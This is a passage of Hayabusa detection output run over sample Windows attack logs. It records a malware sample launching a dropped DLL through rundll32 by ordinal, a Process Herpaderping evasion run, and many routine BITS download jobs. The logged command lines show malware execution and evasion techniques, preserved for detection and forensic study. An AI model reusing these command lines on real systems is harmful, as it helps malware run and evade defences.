06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 